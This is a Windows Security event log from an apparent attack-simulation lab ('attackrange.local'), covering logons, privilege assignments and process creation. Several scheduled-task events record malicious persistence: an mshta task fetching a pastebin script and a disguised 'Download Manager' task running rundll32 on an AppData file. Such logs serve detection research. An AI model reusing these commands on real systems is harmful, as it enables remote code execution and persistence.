Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64928
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265053
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF444
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265052
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1958
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265067
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1424
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4699
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255436
Keywords=Audit Success
Message=A scheduled task was deleted.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Pornhub
Task Content:
04/19/2021 03:54:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265068
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a18
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265070
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1208
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265069
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4699
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255437
Keywords=Audit Success
Message=A scheduled task was deleted.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Windows Free Internet Download Manager
Task Content:
04/19/2021 03:54:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265071
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AFAC9
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265074
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B2966
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265073
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8B2966
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64945
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265072
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B2966
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255438
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Pornhub
Task Content:
2021-04-19T15:54:56
WIN-HOST-797\Administrator
\Pornhub
PT80M
false
2021-04-19T15:54:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
"mshta"
http:\\pastebin.com\raw\tuhQ7gWV
WIN-HOST-797\Administrator
InteractiveToken
LeastPrivilege
04/19/2021 03:55:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-797.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=255439
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-797\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-797
Logon ID: 0xF1C42
Task Information:
Task Name: \Windows Free Internet Download Manager
Task Content:
1.1.1
Tenucy
WInternet Free Download Manager gives you the tools to download many types of files from the Internet and organize them as you see fit
\Windows Free Internet Download Manager
true
HighestAvailable
SYSTEM
InteractiveToken
IgnoreNew
false
true
true
true
false
true
false
true
true
false
false
false
PT0S
6
C:\Windows\system32\rundll32.exe
"C:\Users\Administrator\AppData\Roaming\NetDownloadManager_2756960808\hx1jn.dwn",StartW
04/19/2021 03:55:04 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265075
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A686A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:55:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265076
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x280
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265078
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b6c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265077
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265079
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265080
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1998
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265082
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265081
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265083
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF444
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:55:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265086
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B62AC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:55:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265085
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8B62AC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64958
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:55:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265084
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B62AC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:56:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265087
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
